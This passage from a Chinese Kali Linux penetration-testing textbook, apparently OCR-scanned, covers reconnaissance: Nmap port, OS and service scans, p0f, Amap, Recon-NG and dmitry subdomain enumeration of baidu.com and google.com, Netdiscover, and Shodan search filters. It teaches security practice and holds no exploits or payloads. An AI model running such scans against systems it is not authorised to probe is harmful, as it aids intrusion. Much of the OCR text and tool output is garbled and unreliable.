MAC Address: 00:50:56:E9:AF:47 (VMware) 


Nmap scan report for www.benet.com (192.168.41.136) 
Host is up (0.00056s latency). 

PORT STATE SERVICE 

22/tcp open ssh 

MAC Address: 00:0C:29:31:02:17 (VMware) 


Nmap scan report for 192.168.41.254 

Host is up (0.00027s latency). 

PORT STATE SERVICE 

22/tcp filtered ssh 

MAC Address: 00:50:56:E1:5E:75 (VMware) 


Nmap scan report for 192.168.41.234 
Host is up (0.000052s latency). 
PORT STATE SERVICE 

22/tcp open ssh 


Nmap done: 256 IP addresses (5 hosts up) scanned in 2.81 seconds 

输出 的 结果 显示 了 192.168.41.* 网 段 内 所 有 开局 22 HENS. PA ERES f An 
可 以 看 到 ， 总 共有 五 台 主 机 上 打开 了 22 号 端口 。 
使 用 Nmap 工具 还 可 以 指定 扫描 端口 22 结果 的 输出 格式 。 执 行 命令 如 下 所 示 : 
root@kali:~# nmap -p 22 192.168.41.* -oG /tmp/nmap-targethost-tcp445.txt 


执行 以 上 命令 后 输出 的 信息 与 第 三 步 中 输出 的 结果 类 似 ， 这 里 束 不 再 列举 。 但 是 执行 


该 命令 后 ，Nmap 会 将 输出 的 信息 保存 到 /tmp/ nmap-targethost-tcp445.txt 文件 中 。 


44.2 ”图 形 化 TCP xs 11318 LR. Zenmap 


Zenmap 是 Nmap 官方 推出 的 一 球 基 于 Nmap 的 安全 扫 接 图 形 用 户 界 面 。 它 的 设计 目标 是 快 


速 地 扫描 大 型 网 络 ， 当 然 也 可 以 使 用 它 扫描 单 个 主机 。 下 面 将 介绍 Zenmap 工具 的 使 用 。 


启动 Zenmap 工具 。 在 Kali 图 形 界面 依次 选择 “应 用 程序 ”|Kali Linux|“ 信 息 收 集 ”| 
“DNS 分 析 ”|Zenmap 命令 ， 将 打开 如 图 4.2 所 示 的 界面 。 


Zcnmap 


Scan Tools Profile Help 


Target: | v Profile: | ntense scan v |sran Canc L| 


Command: |nmcp -T1 -A -v 


Filter F osts | | 


图 4.2 Zenmap 起 始 界面 
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1E iz 7f] Target 文本 框 中 输入 目标 主机 地 址 ,在 Profile 文本 杠 中 选择 扫描 类 型 。 设 置 
完 后 ， 单 击 Scan 按钮 ， 扫 描 结 果 如 图 4.3 所 示 。 


Zenmap 


Scan Tools Profile Help 


Target: [192 16841.* wW Profile: Scan Cancel 
Command: |nmap -T4 -A -v 192.168.41.* 


Big] 


os Host 


@ 192.168.41.; 
U 192.168.41.: 


负 www.benet.c 


| 


e 192.168.41. 


Nmap Output | Ports / Hosts Topology Host Details Scans 


nmap -T4 -A -v 192.168.41.* e qm 


Uiscovered open port 53/tcp on 192, 1bt,41.13b A 
Discovered open port 135/tcp on 192.168.41.1 
Discovered open port 443/tcp on 192.168.41.1 
Discovered open port 80/tcp on 192.168.41.136 
Discovered open port 5900/tcp on 192.168.41.1 
Discovered open port 445/tcp on 192.168.41.1 


Discovered open port 6059/tcp on 192,168.41.1 
Completed SYN Stealth Scan against 192.168.41.136 
in 0.17s [3 hosts left) 

Discovered open port 912/tcp on 192.168.411.1 
Discovered open port 49168/tcp on 192.168.41.1 
Discovered open port 902/tcp on 192.168.41.1 
Discovered open port 49153/tcp on 192.168.41.1 


"5 192.168.41.: 


Discovered open port 49155/tcp on 192.168.41.1 
Discovered open port 24800/tcp on 192.168.41.1 
Discovered open port 49152/tcp on 192.168.41.1 = 


图 4.3 扫描 界面 


VA E IB zs Y HAH 192.168.41.*# 网 段 肉 所 有 主机 局 动 的 所 有 端口 信息 。 在 左 侧 栏 中 可 以 
切换 以 主机 或 服务 的 形式 分 别 显 示 详 细 扫 摘 结 果 。 在 右 侧 栏 中 ， 可 以 分 别 碍 看 Namp 输出 
信息 、 端 口 /主机 、 拓 扑 结 构 、 主 机 详细 信息 和 扫描 信息 等 。 


4.5 系统 指纹 识别 


现在 一 些 便携 式 计 算 机 操作 系统 使 用 指纹 识别 来 验证 密码 进行 登录 。 指 纹 识别 是 识别 
系统 的 一 个 典型 模式 ， 包 括 指 纹 图 像 获取 、 处 理 、 特 征 提 取 和 对 等 模块 。 如 果 要 做 渗透 测 
试 ， 需 要 了 解 要 渗透 测试 的 操作 系统 的 类 型 才 可 以 。 本 节 将 介绍 使 用 Nmap 工具 测试 正在 
运行 的 主机 的 操作 系统 。 
4.5.1 使 用 Nmap 工具 识别 系统 指纹 信息 
使 用 Nmap 命令 的 -O 选项 局 用 操作 系统 测试 功能 。 执 行 命 


root@kali:~# nmap -O 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 19:20 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00045s latency). 

Not shown: 996 closed ports 


令 如 下 所 示 : 


PORT STATE SERVICE 
22/tcp open ssh 

53/tcp open domain 
80/tcp open http 

111/tcp open rpcbind 


MAC Address: 00:0C:29:31:02:17 (VMware) /MAC 地 址 
Device type: general purpose 

Running: Linux 2.6.X|3.X 

OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 


OS details: Linux 2.6.32 - 3.9 


// 操 作 系统 类 型 
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Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds 


输出 的 信息 显示 了 主机 192.168.41.136 的 指纹 信息 ， 包 括 目 标 主机 打开 的 端口 、MAC 
地 址 、 操 作 系 统 类 型 和 内 核 版 本 等 。 


4.5.2 指纹 识别 工具 pOf 


pof 是 一 球 百 分 之 百 的 被 动 指纹 识别 工具 。 该 工具 通过 分 析 目 标 主 机 发 出 的 数据 包 ， 

对 主机 上 的 操作 系统 进行 鉴别 ， 即 使 是 在 系统 上 装 有 性 能 良好 的 防火 墙 也 没有 问题 。pOf 
主要 识别 的 信息 如 下 : 
操作 系统 类 型 ， 
Sia H ; 
是 否 运 行 于 防火 墙 之 后 ; 
是 否 运行 于 NAT 模式 ; 
是 否 运行 于 负载 均衡 模式 ; 
远程 系统 已 局 动 时 间 ; 
远程 系统 的 DSL 和 ISP 信息 等 。 
使 用 pof 分 析 Wireshark 捕获 的 一 个 文件 。 执 行 命令 如 下 所 示 : 
root@kali:~# pOf -r /tmp/targethost.pcap -o pOf-result.log 
--- pOf 3.06b by Michal Zalewski <Icamtuf@coredump.cx> --- 

[+] Closed 1 file descriptor. 
[+] Loaded 314 signatures from 'pOf.fp’. 
[+] Will read pcap data from file '/tmp/targethost.pcap'. 
[+] Default packet filtering configured [+VLAN]. 
[+] Log file 'pOf-result.log' opened for writing. 


[+] Processing capture data. 
.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (syn) ]- 


mE maS mai mii mai mai m 


| client = 192.168.41.234/55653 

| os = Linux 2.2.x-3.x 

| dist =0 

| params = generic 

| raw_sig = 4:64+0:0:1460:mss*20,10:mss,sok,ts,nop,ws:df,id+:0 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (mtu) ]- 
| 


| client = 192.168.41.234/55653 
| link = Ethernet or modem 
| raw_mtu = 1500 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (syntack) ]- 


| 
| server = 192.168.41.141/80 


| os - Linux 3.x 


。 00 。 


| dist =0 
| params = none 
| raw_sig = 4:64+0:0:1460:mss*10,6:mss,sok,ts,nop,ws:df:0 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (mtu) ]- 
| 


| server = 192.168.41.141/80 
| link = Ethernet or modem 
| raw_mtu = 1500 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (http request) ]- 
| 


| client = 192.168.41.234/55653 
| app = Firefox 10.x or newer 
| lang = English 
| params = none 
raw sig - 


| ib 

1:Host, User-Agent,Accept=[text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8],Acce 
pt-Language=[en-US,en;q=0.5],Accept-Encoding=[gzip, deflate], Connection=[keep-alive]:Accept- 
Charset,Keep-Alive:Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 
Iceweasel/22.0 


` 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (http response) ]- 
| 


| server = 192.168.41.141/80 

| app = Apache 2.x 

| lang = none 

| params = none 

| raw_sig = 


1:Date,Server,Accept-Ranges=[bytes], ?Content-Length, Connection=[close],Content-T ype:Keep- 
Alive:Apache/2.2.15 (Red Hat) 


All done. Processed 718 packets. 


输出 的 信息 是 pOf 分 析 targethost.pcap HY —^ P 45K. fa AHN TP vin GRA at 


的 详细 信息 ， 包 括 操作 系统 类 型 、 地 址 、 以 太 网 模式 、 运 行 的 服务 器 和 端口 号 等 。 
AEE: pof 命令 的 v2 和 v3 版 中 所 使 用 的 选项 有 很 大 的 差别 。 例 如 ， 在 pOfv2 版 本 中 ， 


指定 文件 使 用 的 选项 是 -s， 但 是 在 v3 版 本 中 是 -r。 本 书 中 使 用 的 pOf 版 本 是 v3. 


4.6 服务 的 指纹 识别 


为 了 确保 有 一 个 成 功 的 渗透 测试 ， 必 须 需 要 知道 目标 系统 中 服务 的 指纹 信息 。 服 务 指 


纹 信 息 包 括 服 务 端 口 、 服 务 名 和 版 本 等 。 在 Kali 中 ， 可 以 使 用 Nmap 和 Amap 工具 识别 指 
纹 信 息 。 本 节 将 介绍 使 用 Nmap 和 Amap 工具 的 使 用 。 
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46.1 使 用 Nmap 工具 识别 服务 指纹 信息 


使 用 Nmap T.H. ftr 192.168.41.136 服务 上 正在 运行 的 端口 。 执 行 命 令 如 下 所 示 : 
root@kali:~# nmap -sV 192.168.41.136 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 10:56 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00020s latency). 

Not shown: 995 closed ports 


PORT STATE SERVICE VERSION 
21/tcp open ftp vsftpd 2.2.2 
22/tcp openssh OpenSSH 5.3 (protocol 2.0) 
53/tcp open domain 

80/tcp openhttp Apache httpd 2.2.15 ((Red Hat)) 
111/tcp openrpcbind 2-4 (RPC #100000) 


MAC Address: 00:0C:29:31:02:17 (VMware) 

Service Info: OS: Unix 

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds 


从 输出 的 信息 中 可 以 查看 到 目标 服务 器 上 运行 的 端口 号 有 21、22、53、80 A111. [n] 
时 ， 还 获取 各 个 端口 对 应 的 服务 及 版 本 信息 。 


4.6.2 服务 枚 举 工 具 Amap 


Amap 是 一 个 服务 枚 举 工 具 。 使 用 该 工具 能 识别 正 运行 在 一 个 指定 端口 或 一 个 范围 端 
口上 的 应 用 程序 。 下 面 使 用 Amap 工具 在 指定 的 50—100 端口 范围 内 ， 测 试 目 标 主机 
192.168.41.136 上 正在 运行 的 应 用 程序 。 执 行 命令 如 下 所 示 : 


root@kali:~# amap -bq 192.168.41.136 50-100 
amap v5.4 (www.thc.org/thc-amap) started at 2014-04-21 11:20:36 - APPLICATION MAPPING 


mode 
Protocol on 192.168.41.136:80/tcp matches http - banner <IDOCTYPE HTML PUBLIC 
"JIIETF//IDTD HTML 2.0//EN">\n<html><head>\nctitle>501 Method Not 


Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to / not 
supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.15 (Red Hat) Server at www.benet.c 
Protocol on 192.168.41.136:80/tcp matches http-apache-2 - banner: «IDOCTYPE HTML PUBLIC 
"JIIETF//IDTD HTML 2.0//EN">\n<html><head>\nctitle>501 Method Not 
Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to / not 
supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.15 (Red Hat) Server at www.benet.c 
Protocol on 192.168.41.136:53/tcp matches dns - banner: \f 

amap v5.4 finished at 2014-04-21 11:20:48 


输出 的 信息 显示 了 192.168.41.136 主机 在 50—100 端口 范围 内 正在 运行 的 端口 。 从 输 
出 结果 的 第 二 段 内 容 中 可 以 了 解 到 主机 192.168.41.136 使 用 的 是 Red Hat 操作 系统 ， 并 且 
正在 运行 看 版 本 为 2.2.15 的 Apache 服务 器 ， 其 开放 的 端口 是 80。 从 倒数 第 二 行 信 息 中 可 
以 看 到 该 主机 还 运行 了 DNS 服务 器 ， 其 开放 的 端口 是 53。 
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47 其 他 信息 收集 手段 


上 面 介 绍 了 使 用 不 同 的 工具 以 操作 步骤 的 形式 进行 了 信息 收集 。 在 Kali 中 还 可 以 使 用 
一 些 香 规 的 或 非常 规 方 法 来 收集 信息 ， 如 使 用 Recon-NG 框架 、Netdiscover 工具 和 Shodan 
工具 等 。 本 节 将 介绍 使 用 这 些 方法 ， 实 现 信 息 收 集 。 


4.7.1 Recon-NG 框架 


Recon-NG 是 由 Python 编写 的 一 个 开源 的 Web 侦查 (信息 收集 ) HES. Recon-NG 框 
架 是 一 个 强大 的 工具 , 使 用 它 可 以 目 动 的 收集 信息 和 网 络 侦 碍 。 下 面 将 介绍 使 用 Recon-NG 
侦查 工具 。 

局 动 Recon-NG 框架 。 执 行 命 令 如 下 所 示 : 


root@kali:~# recon-ng 


(Se eee © eee ee a E E 4d EET. 
PIECE » 7 TIN JAHN 
EINE ei ne 4d DP IDIOT IR C IE 
FN EN / m Se ee SETS E, 

"EU ee ee ee eee 7 E APRES 


J8 DE NE L| E DEN DEREN E SRL ORIS 
iai HLS LH O CHIO CLINT TY I T 
| Consulting | Research | Development | Training | 
| http://www.blackhillsinfosec.com | 


[recon-ng v4.1.4, Tim Tomes (@LaNMaSteR53)] 
[56] Recon modules 
[5] Reporting modules 
[2] Exploitation modules 
[2] Discovery modules 
[1] Import modules 
[recon-ng][default] > 


以 上 输出 信息 显示 了 Recon-NG 框架 的 基本 信息 。 例 如 ， 在 Recon-NG 框架 下 ， 包 括 
56 个 侦查 模块 、5 个 报告 模块 、2 个 渗透 攻击 模块 、2 个 发 现 模 块 和 1 个 导入 模块 。 看 到 
[recon-ng][default] > 提示 和 从 ,表示 成 功 登 录 Recon-NG 框架 ,现在 ,就 可 以 在 [recon-ng][default] 
> 提示 符 后 面 执行 各 种 操作 命令 了 。 

首次 使 用 Recon-NG 框架 之 前 , 可 以 使 用 help 命令 查看 所 有 可 执行 的 命令 。 如 下 所 示 ; 

[recon-ng][default] > help 

Commands (type [help|?] <topic>): 


add Adds records to the database 
back Exits current prompt level 
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del Deletes records from the database 
exit Exits current prompt level 

help Displays this menu 

keys Manages framework API keys 

load Loads specified module 

pdb Starts a Python Debugger session 
query Queries the database 

record Records commands to a resource file 
reload Reloads all modules 

resource Executes commands from a resource file 
search Searches available modules 

set Sets module options 

shell Executes shell commands 

show Shows various framework items 
spool Spools output to a file 

unset Unsets module options 

use Loads specified module 

workspaces Manages workspaces 


以 上 输出 信息 显示 了 在 Recon-NG 框 染 中 可 运行 的 命令 。 该 框 染 和 Metasploit HEAR 
似 ， 同 样 也 文 持 很 多 模块 。 此 时 ， 可 以 使 用 show modules 命令 查看 所 有 有 效 的 模块 列表 。 
执行 命令 如 下 所 示 : 


[recon-ng][default] > show modules 

Discovery 
discovery/info_disclosure/cache_snoop 
discovery/info disclosure/interesting files 

Exploitation 
exploitation/injection/lcommand injector 
exploitation/injection/xpath bruter 

Import 
import/csv file 

Recon 
recon/companies-contacts/facebook 
recon/companies-contacts/jigsaw 
recon/companies-contacts/jigsaw/point_usage 
recon/companies-contacts/jigsaw/purchase_contact 
recon/companies-contacts/jigsaw/search_contacts 
recon/companies-contacts/linkedin_auth 
recon/contacts-contacts/mangle 
recon/contacts-contacts/namechk 
recon/contacts-contacts/rapportive 
recon/contacts-creds/haveibeenpwned 


recon/hosts-hosts/bing_ip 
recon/hosts-hosts/ip_neighbor 
recon/hosts-hosts/ipinfodb 
recon/hosts-hosts/resolve 
recon/hosts-hosts/reverse_resolve 
recon/locations-locations/geocode 
recon/locations-locations/reverse geocode 
recon/locations-pushpins/flickr 
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recon/locations-pushpins/picasa 
recon/locations-pushpins/shodan 
recon/locations-pushpins/twitter 
recon/locations-pushpins/youtube 
recon/netblocks-hosts/reverse resolve 
recon/netblocks-hosts/shodan net 
recon/netblocks-ports/census 2012 
Reporting 


gro 
reporting/html 
reporting/list 
reporting/pushpin 
reporting/xml 
[recon-ng][default] > 
从 输出 的 信息 中 ， 可 以 看 到 显示 了 五 部 分 。 每 部 分 包括 的 模块 数 ， 在 启动 Recon-NG 
框 染 后 可 以 看 到 。 用 户 可 以 使 用 不 同 的 模块 进行 各 种 的 信息 收集 。 下 面 以 例子 的 形式 介绍 
使 用 Recon-NG 中 的 模块 进行 信息 收集 。 
【实例 4-3] 使 用 recon/domains-hosts/baidu site 模块 ， 枚 举 baidu 网 站 的 子 域 。 具 体操 
作 步 骤 如 下 所 示 。 
(1) 使 用 recon/domains-hosts/baidu site 模块 。 执 行 命令 如 下 所 示 : 


[recon-ng][default] > use recon/domains-hosts/baidu site 


(2) 查看 该 模块 下 可 配置 选项 参数 。 执 行 命令 如 下 所 示 : 


[recon-ng][default][baidu_site] > show options 
Name Current Value Reg Description 


SOURCE default yes source of input (see 'show info' for details) 
[recon-ng][default][baidu site] > 


从 输出 的 信息 中 ， 可 以 看 到 有 一 个 选项 需要 配置 。 
(3) 配置 SOURCE 选项 参数 。 执 行 命令 如 下 所 示 : 


[recon-ng][default][baidu_site] > set SOURCE baidu.com 
SOURCE => baidu.com 


从 输出 的 信息 中 ， 可 以 看 到 SOURCE 选项 参数 已 经 设置 为 baidu.com。 
(4) 局 动 信息 收集 。 执 行 命令 如 下 所 示 : 


[recon-ng][default][baidu_site] > run 


BAIDU.COM 


[*] map.baidu.com 
[*] 123.baidu.com 

[*] ingyan.baidu.com 
[*] top.baidu.com 

[*] www.baidu.com 
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[*] hi-.baidu.com 

[*] video.baidu.com 

[*] pan.baidu.com 

[*] zhidao.baidu.com 

[*] Sleeping to avoid lockout... 


SUMMARY 


[*] 9 total (2 new) items found. 


从 输出 的 信息 中 , 可 以 看 到 找到 了 9 个 子 域 。 枚 举 到 的 所 有 数据 将 被 连接 到 Recon-NG 
放置 的 数据 库 中 。 这 时 候 ， 用 户 可 以 创建 一 个 报告 查看 被 连接 的 数据 。 

【实例 4-4】 查看 获取 的 数据 。 具 体操 作 步 又 如 下 所 示 。 

(1) 选择 reporting/csv 模块 ， 执 行 命令 如 下 所 示 。 


[recon-ng][default] > use reporting/csv 


(2) 生成 报告 。 执 行 命令 如 下 所 示 : 


[recon-ng][default][csv] > run 
[*] 9 records added to "/root/.recon-ng/workspaces/default/results.csv'. 


从 输出 的 信息 中 可 以 看 到 ， 枚 举 到 的 9 个 记录 已 被 添加 到 HAooyreconmng 
/workspaces/defaultresults.csv 文件 中 。 打 开 访 文件， 如 图 44 所 示 。 


results.csv 


文件 (F) 编辑 (E) 搜索 (5) RIO) THH) 
"123 .baidu. com" " : 
"hi.baidu.com" 

AERE o vado, nu nM n dw n uw ue 


"map.baidu.com","" nu un un um 
"pan baidu com" "nien 
"toap.DHidu:.EOM = g i R 
"video.baidu.com","" unu un nmm mm 
"WM Hid cen as e RR 
"zhidao.baidu.com","" "nu unu un "num 


图 4.4 results.csv 文件 


(3) 从 该 界面 可 以 看 到 ， 枚 举 到 的 所 有 子 域 。 
用 户 也 可 以 使 用 Dmitry 命令 ， 答 询 关 于 网 站 的 信息 。 下 面 将 介绍 Dmitry 命令 的 使 用 。 
fr Dmitry 命令 的 帮助 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# dmitry -h 

Deepmagic Information Gathering Tool 

“There be some deep magic going on" 

dmitry: invalid option -- 'h' 

Usage: dmitry [-winsepfb] [-t 0-9] [-o 9ohost.txt] host 
-o Save output to %host.txt or to file specified by -o file 
-| Perform a whois lookup on the IP address of a host 
-w Perform a whois lookup on the domain name of a host 
-n Retrieve Netcraft.com information on a host 
-s Perform a search for possible subdomains 
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-e Perform a search for possible email addresses 


-p Perform a TCP port scan on a host 
*-f Perform a TCP port scan on a host showing output reporting filtered ports 


*-b Read in the banner received from the scanned port 
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 ) 
*Requires the -p flagged to be passed 


以 上 信息 显示 了 dmitry 命令 的 语法 格式 和 所 有 可 用 参数 。 下面 使 用 dmitry 命令 的 -s 选 
项 ， 查 询 合 理 的 子 域 。 执 行 命令 如 下 所 示 : 

root@kali:~# dmitry -s google.com 

Deepmagic Information Gathering Tool 

"There be some deep magic going on" 

HostlP:173.194.127.71 


HostName:google.com 
Gathered Subdomain information for google.com 


Searching Google.com:80... 

HostName:www.google.com 

HostlP:173.194.127.51 

Searching Altavista.com:80... 

Found 1 possible subdomain(s) for host google.com, Searched 0 pages containing 0 results 
All scans completed, exiting 


从 输出 的 信息 中 ,可 以 看 到 搜索 到 了 一 个 子 域 。 该 子 域名 为 www.google.com, IP 地 址 
为 173.194.127.51。 该 命令 默认 是 从 google.com 网 站 搜索 ， 如 果 不 能 连接 google.com 网 站 
的 话 ， 执 行 以 上 命令 将 会 出 现 Unable to connect: Socket Connect Error 错误 信息 。 


4.7.2 ARP 侦查 工具 Netdiscover 


Netdiscover 是 一 个 主动 /被 动 的 ARP 侦查 工具 。 该 工具 在 不 使 用 DHCP 的 无 线 网 络 上 
非常 有 用 。 使 用 Netdiscover 工具 可 以 在 网 络 上 扫描 IP 地 址 ， 检 查 在 线 主 机 或 搜索 为 它们 
发 送 的 ARP 请 求 。 下 面 将 介绍 Netdiscover 工具 的 使 用 方法 。 

Netdiscover 命令 的 语法 格式 如 下 所 示 : 


netdiscover [-i device] [-r range | -I file | -p] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-C] 


以 上 语法 中 ， 各 选项 参数 含义 如 下 所 示 。 

O -idevice: 指定 网 络 议 备 接口 。 

-r range: FREH Hii P ZU. 

-l file: 指定 扫 插 范围 列表 文件 。 

-p: 使 用 被 动 模式 ， 不 发 送 任 何 数据 。 
-s time: 每 个 ARP 请 求 之 间 的 睡眠 时 间 。 
-n node: 使 用 八字 节 的 形式 扫描。 

-c count: 发 送 ARP 请 求 的 时 间 次 数 。 

-f: 使 用 主动 模式 。 


OoOoovoovcvoou 
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d: 忽略 配置 文件 。 

-S: 局 用 每 个 ARP 请 求 之 间 抑 制 的 睡眠 时 间 。 

-P: 打印 结果 。 

-L: 将 捕获 信息 输出 ， 并 继续 进行 扫 搬 。 

【实例 4-$】 使 用 Netdiscover 工具 攻击 扫 拉 局域网 中 所 有 的 主机 。 执 行 命令 如 下 所 示 : 


root@kali:~# netdiscover 


执行 以 上 命令 后 ， 将 显示 如 下 所 示 的 信息 : 
Currently scanning: 10.7.99.0/8 | Screen View: Unique Hosts 


Oooo 


692 Captured ARP Req/Rep packets, from 3 hosts. Total size: 41520 


IP At MAC Address Count Len MAC Vendor 
192.168.6.102 00:e0:1c:3c:18:79 296 17760 Cradlepoint, Inc 
192.168.6.1 14:e6:e4:ac:fb:20 387 23220 Unknown vendor 
192.168.6.110 00:0c:29:2e:2b:02 09 540 VMware, Inc. 


从 输出 的 信息 中 ， 可 以 看 到 扫 摘 到 了 三 台 主 机 。 其 IP 地 址 分 别 为 192.168.6.102, 
192.168.6.1 和 192.168.6.110。 


4.7.3 搜索 引擎 工具 Shodan 


Shodan 是 互联 网 上 最 强大 的 一 个 搜索 引擎 工具 。 该 工具 不 是 在 网 上 搜索 网 址 ， 而 是 下 
接 搜索 服务 器 。Shodan 可 以 说 是 一 球 “ 黑 上 暗 ” 谷 歌 ， 一 直 不 停 的 在 寻找 看 有 所 有 和 互联 网 连 
BH aS ae. TA 打印 机 和 路 由 器 等 。 每 个 月 都 会 在 大 约 5 亿 个 服务 器 上 日 夜 不 停 的 
搜集 信息 。 下 面 将 介绍 Shodan 工具 的 使 用 。 

Shodan 的 官网 网 址 是 www.shodanhq.com。 打 开 该 网 址 界面 ， 如 图 4.5 Ara. 


/ & SHODAN - Computer S x \ — 


€ C IE www.shodanhqg.com 


J Shodan Exploits Scanhub Maps Blog | cinnüversary Promotion 


“< SHODAN ET E- 


EXPOSE ONLINE DEVICES. 


WEBCAMS. ROUTERS. 
POWER PLANTS. IPHONES. WIND TURBINES. 
REFRIGERATORS. VOIP PHONES. 


TAKE A TOUR 


图 4.5 Shodan 官网 


如 末 要 搜索 一 些 东 西 时 ,在 Shodan 对 应 的 文本 框 中 输入 搜索 的 内 容 。 然 后 , 单 击 Search 
按钮 开始 搜索 。 例 如 ， 用 己 想 要 搜索 思科 路 由 堪 ， 则 在 搜索 框 中 输入 Cisco， 并 单 击 Search 


。 08 o 


按钮 。 搜 索 到 结果 后 ， 显 示 界 面 如 图 4.6 所 示 。 


/ 只 SHODAN - Computers: x \ - 


€ C (5 www.shodanhq.com/search?q=Cisco 


Shodan Exploits Scanhub Maps Blog Anniversary Promotiorgister 


“+ SHODAN sare 


Results 1 - 10 of about 3451395 for Cisco 


Services 173.163.131.101 
1,003,241 Comcast Business SSH-1.99-Cisco-1.25 
TOMES ree anes 
577,812 =Æ Lancaster Q^ 
330,281 Hu e 
SNMP 306,575 173-163-131-101-BusName- il 


panjde.hfc.comcastbusiness.net 


Top Countries 186.56.20.158 
United States 1,020,959 entina 


Celebrating 3 
Russian Federation 179,180 ae years of 


China 154,572 = Shodan 


Mexico 125,941 
Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRI 
Italy 125,788 
RELEASE SOFTWARE (fcl) 
Technical Support: http: //wm.cisco.com/techsupport 
Copyright (c) 1986-2006 by Cisco Systems, Inz. " 
Compiled Sat 07-Jan-06 04:34 by alnguyen . SHODAN 


图 4.6 搜索 结果 


从 该 界面 可 以 看 到 搜索 到 全 球 三 百 多 万 的 Cisco 路 由 器 。 在 该 界面 用 户 可 以 单 击 任何 
IP 地址， 直接 找到 该 设备 。 


在 使 用 Shodan 搜索 引擎 中 ， 可 以 使 用 过 滤 噩 通过 缩小 搜索 范 围 快速 的 得 询 需 要 的 东 


西 。 如 碍 找 运 行 在 美国 IS 8.0 的 所 有 IIS 服务 ， 可 以 使 用 以 下 搜索 方法 ， 如 图 4.7 所 示 。 


chodan 


Exploits Scanhub Maps Blog Anniversary Promotion Settings Logcut [suy ? 


* SHODAN IIS/8 0 hostname:microsoft.com country:US Search 


Homa Saarch Diractory Data Analytics/Fxports Davalopar Canter EL 


** Add to Directory all Export Data 
Results 1 - 10 cf about 248 for lIS/8.0 hostname:microsoft.com country:U S 


Services Microsoft Internet Intormation Services 8 
uTTPS 131.107.16.138 HTTP/1.0 200 OK 


Cantent- ype: text/html 


m VE ei 


HTTP Alternate we 7 | Last-Mod fied: Tue, 06 Mov 2012 07:53:17 GMT Yon 
HTTPS Alternate Details Azcert-Raiges: cytes Hu T e 
HTTP ETag: "fcae23ef 4bbed1:0” rcar 
rdg.microsof.com server: Microsott- 11 S/9 .U 
X-Powered-By: ASP.NET 
Date: sat, 12 Jel 2014 U4:13:4| GMI 


Nedmond Cantent-Langth: 1338 Celebrating 3 
San Antonio 


years of 
Shodan 


Top Cities 


Naperville 


图 4.7 搜索 的 OS 服务 


在 该 界面 显示 了 搜索 到 的 一 个 IS 8.0 服务 器 。 从 搜索 到 的 设备 中 ， 可 以 看 到 关于 该 服 
务 器 的 标题 信息 、 所 在 的 国家 、 主 机 名 和 文本 信息 。 
在 Shodan 搜索 时 ， 需 要 注意 一 些 过 滤器 命令 的 语法 。 委 见 的 几 种 情况 如 下 所 示 。 


1. City 和 Country 命 令 


使 用 City 和 Country 命令 可 以 缩小 搜索 的 地 理 位 置 。 如 下 所 示 。 
Q country:US 表示 从 美国 进行 搜索 。 
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city: Memphis 表示 从 扣 斐 斯 城市 搜索 。 


City 和 Country 命令 也 可 以 结合 使 用 。 如 下 所 示 。 


n 
e 


country:US city:Memphis. 
HOSTNAME fs > 


HOSTNAME 命令 通过 指定 主机 名 来 扫描 整个 域名 。 


Q 
3. 


hostname:google 表示 搜索 google 主机 。 


NETAS 


使 用 NET 命令 扫 摘 单个 卫 或 一 个 网 络 范 围 。 如 下 所 示 。 


n 
d 


net:192.168.1.10: 扫描 主机 192.168.1.10. 
net:192.168.1.0/24: 扫描 192.168.1.0/24 网 络 内 所 有 主机 。 


4. Title 命 令 


使 用 Title 命令 可 以 搜索 项 目 。 如 下 所 示 。 


d 
9. 


title: “Server Room” 表 示 搜 索 服 务 器 机 房 信 息 。 
关键 字 搜 索 


Shodan 使 用 一 个 关键 字 搜 索 是 最 受 欢 迎 的 方式 。 如 条 知道 目标 系统 使 用 的 服务 器 闫 型 
RRASA, KERA Web 页 面 是 很 容易 的 。 如 下 所 示 。 


n 


n 
6. 


n 
n 
Q 


apache/2.2.8 200 ok: 表示 搜索 所 有 Apache 服务 正在 运行 的 2.2.8 版 本 ， 并 且 仅 搜 
索 打 开 的 站 点 。 

apache/2.2.8 -401 -302: 表示 跳 过 401 的 非法 页 或 302 删除 页 。 

组 合 搜 索 

IIS/7.0 hostname:YourCompany.com city:Boston 表示 搜索 在 波士顿 所 有 正在 运行 
IIS/7.0 的 Microsoft 服务 器 。 

IIS/5.0 hostname:YourCompany.com country:FR 表示 搜索 在 法 国 所 有 运行 IIS/5.0 的 
系统 。 

Title:camera hostname: YourCompany.com 表示 在 某 台 主机 中 标题 为 camera 的 信息 。 
geo:33.5,36.3 os:Linux 表示 使 用 坐标 轴 (ARE 33.5, Ai 36.3) 的 形式 搜索 Linux 
操作 系统 。 

其 他 搜索 术语 

Port: 通过 端口 号 搜索 。 

OS: 通过 操作 系统 搜索 。 

After 或 Before: 使 用 时 间 搜 索 服 务 。 


【实例 4-6】 使 用 Metasploit 实现 Shodan 搜索 。 具 体操 作 步 又 如 下 所 示 。 
(1) 在 Shodanhq.com 网 站 注册 一 个 免费 的 账户 。 
